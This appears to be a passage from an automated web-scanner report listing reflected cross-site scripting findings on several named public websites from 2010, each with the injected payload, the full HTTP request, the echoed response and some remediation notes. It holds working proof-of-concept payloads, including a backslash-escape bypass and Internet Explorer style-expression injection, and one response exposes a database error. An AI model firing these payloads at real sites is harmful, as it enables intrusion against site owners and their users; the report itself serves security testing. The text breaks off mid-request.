Severity:   High
Confidence:   Certain
Host:   http://wikitravel.org
Path:   /en/Torontoa333e/%27%253Balert(1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daddd\'%3balert(1)//ec3631b4d56 was submitted in the REST URL parameter 2. This input was echoed as daddd\\';alert(1)//ec3631b4d56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /en/Torontoa333edaddd\'%3balert(1)//ec3631b4d56/%27%253Balert(1 HTTP/1.1
Host: wikitravel.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 04:00:34 GMT
Server: Apache
Content-Language: en, en
Vary: Accept-Encoding
Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946057
Expires: Mon, 29 Sep 2008 18:06:17 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from wikitravel.org
X-Cache-Lookup: MISS from wikitravel.org:80
Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">
addOnloadHook(function () {
set_page_title('Torontoa333edaddd\\';alert(1)//ec3631b4d56/\';alert(1');
set_script_path('/wiki/en/index.php');
set_db_name('wikitravel_org_-_en');
set_admins('3,4,148,176,206,361,389,404,551,741,764,1111,1288,1399,1549,2493,2751,2752,3005,3115,37
...[SNIP]...

2.144. http://wikitravel.org/en/Torontoa333e/%27%253Balert(1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikitravel.org
Path:   /en/Torontoa333e/%27%253Balert(1

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf3df\'%3balert(1)//c3178e86793 was submitted in the REST URL parameter 3. This input was echoed as bf3df\\';alert(1)//c3178e86793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /en/Torontoa333e/%27%253Balert(1bf3df\'%3balert(1)//c3178e86793 HTTP/1.1
Host: wikitravel.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 04:00:47 GMT
Server: Apache
Content-Language: en, en
Vary: Accept-Encoding
Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946070
Expires: Mon, 29 Sep 2008 18:06:17 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from wikitravel.org
X-Cache-Lookup: MISS from wikitravel.org:80
Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">
addOnloadHook(function () {
set_page_title('Torontoa333e/\';alert(1bf3df\\';alert(1)//c3178e86793');
set_script_path('/wiki/en/index.php');
set_db_name('wikitravel_org_-_en');
set_admins('3,4,148,176,206,361,389,404,551,741,764,1111,1288,1399,1549,2493,2751,2752,3005,3115,3703,3934,396
...[SNIP]...

2.145. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 930f3"-alert(1)-"bc36973c37e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php930f3"-alert(1)-"bc36973c37e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 25 Nov 2010 02:56:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=6t3itie1fqtk3vtif5tits57v4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php930f3"-alert(1)-"bc36973c37e";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.146. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f704<script>alert(1)</script>a321a7a5847 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php2f704<script>alert(1)</script>a321a7a5847 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 25 Nov 2010 02:56:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=qmg1e8sehbasbhf50kdg71euj5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php2f704<script>alert(1)</script>a321a7a5847</strong>
...[SNIP]...

2.147. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dade6"-alert(1)-"c9bfdad426f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/dade6"-alert(1)-"c9bfdad426f HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 02:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/dade6"-alert(1)-"c9bfdad426f";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.148. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcc69"%20style%3dx%3aexpression(alert(1))%20ecf8a24fcae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcc69\" style=x:expression(alert(1)) ecf8a24fcae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&pub=mitconsul/bcc69"%20style%3dx%3aexpression(alert(1))%20ecf8a24fcaeting HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 02:56:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="mitconsul/bcc69\" style=x:expression(alert(1)) ecf8a24fcaeting" />
...[SNIP]...

2.149. http://www.addthis.com/bookmark.php [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7671"%20style%3dx%3aexpression(alert(1))%20f7b03aeb155 was submitted in the pub parameter. This input was echoed as b7671\" style=x:expression(alert(1)) f7b03aeb155 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&pub=mitconsultingb7671"%20style%3dx%3aexpression(alert(1))%20f7b03aeb155 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 02:56:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="mitconsultingb7671\" style=x:expression(alert(1)) f7b03aeb155" />
...[SNIP]...

2.150. http://www.addthis.com/bookmark.php [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5dd5"style%3d"x%3aexpression(alert(1))"b78b40a2e00 was submitted in the v parameter. This input was echoed as b5dd5"style="x:expression(alert(1))"b78b40a2e00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250b5dd5"style%3d"x%3aexpression(alert(1))"b78b40a2e00&pub=mitconsulting HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 02:56:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-250b5dd5"style="x:expression(alert(1))"b78b40a2e00" />
...[SNIP]...

2.151. http://www.autonet.ca/autos/search/testdrives/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.autonet.ca
Path:   /autos/search/testdrives/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51264"><a>9e90e248a17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /autos/search51264"><a>9e90e248a17/testdrives/ HTTP/1.1
Host: www.autonet.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 04:46:14 GMT
Server: Apache
Set-Cookie: PHPSESSID=63be54d0b0b81f6ea74d6cbbaaa2982d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: autonet_language=en; expires=Fri, 25-Nov-2011 04:46:14 GMT; path=/
Set-Cookie: autonet_language=en; expires=Fri, 25-Nov-2011 04:46:14 GMT; path=/
Set-Cookie: autonet_distance=250; expires=Fri, 25-Nov-2011 04:46:14 GMT; path=/
Set-Cookie: autonet_typeDistance=kms; expires=Fri, 25-Nov-2011 04:46:14 GMT; path=/
Set-Cookie: autonet_cityPostalCode=edmonton; path=/
Set-Cookie: autonet_userCity=Edmonton%2C+AB; path=/
Set-Cookie: autonet_userCityPostalCode=edmonton; path=/
Set-Cookie: autonet_distance=0; expires=Fri, 25-Nov-2011 04:46:14 GMT; path=/
ServerID: autonet-prod-fe-01
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from rp-03
X-Cache-Lookup: MISS from rp-03:80
Via: 1.0 rp-03:80 (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="Key
...[SNIP]...
<body id="search51264"><a>9e90e248a17">
...[SNIP]...

2.152. http://www.calgarykiosk.ca/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.calgarykiosk.ca
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 805c4<a>b42ac918b8b was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=228805c4<a>b42ac918b8b HTTP/1.1
Host: www.calgarykiosk.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 04:52:01 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '228805c4' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228805c4<a>b42ac918b8b ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.153. http://www.clickonf5.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clickonf5.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c912"><script>alert(1)</script>8af7a4bb544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c912\\\"><script>alert(1)</script>8af7a4bb544 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4c912"><script>alert(1)</script>8af7a4bb544=1 HTTP/1.1
Host: www.clickonf5.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 04:53:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Cookie
X-Pingback: http://www.clickonf5.org/xmlrpc.php
Cache-Control: max-age=900
Expires: Thu, 25 Nov 2010 05:08:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<a href="http://www.clickonf5.org/?4c912\\\"><script>alert(1)</script>8af7a4bb544=1">
...[SNIP]...

2.154. http://www.constantcontact.com/_script/clickpathmedia.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/clickpathmedia.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10434'%3balert(1)//4c77d1935b5 was submitted in the REST URL parameter 1. This input was echoed as 10434';alert(1)//4c77d1935b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_script10434'%3balert(1)//4c77d1935b5/clickpathmedia.js HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:39 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=B4BDBE4DFEC809FE688F554D8D5837ED.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:39 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:39 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:39 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:39 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_script10434';alert(1)//4c77d1935b5/clickpathmedia.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';
s.
...[SNIP]...

2.155. http://www.constantcontact.com/_script/default/javascript.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/default/javascript.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1729'%3balert(1)//9dca623ddf4 was submitted in the REST URL parameter 1. This input was echoed as f1729';alert(1)//9dca623ddf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_scriptf1729'%3balert(1)//9dca623ddf4/default/javascript.js?version=1290097629000 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:32 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=7832F9442E9F45EE25FDFEEA02D3EBB1.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:32 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:32 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:32 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:32 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_scriptf1729';alert(1)//9dca623ddf4/default/javascript.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510'
...[SNIP]...

2.156. http://www.constantcontact.com/_script/excanvas.compiled.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/excanvas.compiled.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e90f5'%3balert(1)//d4c3ecda18a was submitted in the REST URL parameter 1. This input was echoed as e90f5';alert(1)//d4c3ecda18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_scripte90f5'%3balert(1)//d4c3ecda18a/excanvas.compiled.js?version=1290097629000 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
